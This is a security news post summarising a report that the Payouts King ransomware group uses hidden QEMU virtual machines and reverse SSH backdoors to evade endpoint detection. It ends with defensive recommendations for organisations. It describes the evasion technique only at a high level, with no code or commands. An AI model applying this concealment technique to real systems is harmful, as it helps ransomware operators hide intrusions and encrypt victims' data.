Payouts King Ransomware Uses QEMU VMs to Evade Security – Veri Sızıntısı
Live
Search
Company
About Founder's Note Press & Media Privacy Policy Terms of Service FAQ Brand Kit
Products
HUBOne HUBCorp Coming Soon Veri Sızıntısı Android Coming Soon Veri Sızıntısı iOS Coming Soon Veri Sızıntısı Huawei Coming Soon Breach Radar Argus Flow Argus Engine LivePlatform
Technologies
What is Argus AI? Try on HUBOne What is Argus Flow? What is Argus Engine?
Blog Contact

Payouts King Ransomware Uses QEMU VMs to Bypass Security

The Payouts King ransomware group has adopted a novel technique, leveraging QEMU virtual machines to evade endpoint security measures. This method involves creating hidden virtual environments on compromised systems, enabling the ransomware to execute undetected and encrypt data.

Payouts King Ransomware Uses QEMU VMs to Bypass Security

Payouts King Ransomware's New Tactics

A recent report reveals that the Payouts King ransomware group is employing a sophisticated new method to bypass conventional endpoint security solutions. This group is utilizing the QEMU emulator to establish reverse SSH backdoors, facilitating the execution of hidden virtual machines on targeted systems.

Understanding the Attack Method

The core of this advanced attack lies in the deployment of QEMU (Quick EMUlator), a generic and open-source machine emulator and virtualizer. Instead of directly executing malicious payloads on the host system, Payouts King ransomware operators use QEMU to:

  • Establish Reverse SSH Backdoors: This allows attackers to maintain persistent access and control over the compromised system, often without being flagged by security tools.
  • Run Hidden Virtual Machines: By running the ransomware payload within a stealthy, isolated virtual environment, the malicious activity is effectively masked from the host operating system's security agents. These VMs are designed to operate beneath the radar of standard endpoint detection and response (EDR) systems.

This approach presents a significant challenge for cybersecurity defenses, as the malicious actions are contained within an environment that security tools might not be monitoring or are unable to fully inspect, allowing the ransomware to encrypt data without triggering alarms.

Has your email been leaked? Check for free — results in seconds.

Check Now →

Implications for Organizations

The use of QEMU VMs by Payouts King highlights an evolving threat landscape where ransomware groups are investing in more intricate methods to achieve their objectives. Organizations must:

  • Enhance Monitoring Capabilities: Move beyond signature-based detection to advanced behavioral analysis that can spot unusual system processes or resource utilization indicative of virtual machine execution.
  • Strengthen Endpoint Protection: Implement multi-layered security strategies that include advanced threat prevention, detection, and response across all endpoints.
  • Regularly Update & Patch: Ensure all systems and security software are kept up-to-date to mitigate known vulnerabilities.
  • Employee Training: Educate staff on phishing and social engineering tactics, which often serve as initial compromise vectors.

Source

https://www.bleepingcomputer.com/news/security/payouts-king-ransomware-uses-qemu-vms-to-bypass-endpoint-security/

Share This Article
X LinkedIn WhatsApp
← Previous Post Vercel Confirms Data Breach as Hackers Attempt to Sell Stolen Information Next Post → Man Sentenced to 30 Months for Selling Hacked DraftKings Accounts

Weekly Newsletter

Curated data breach news delivered to your inbox every week.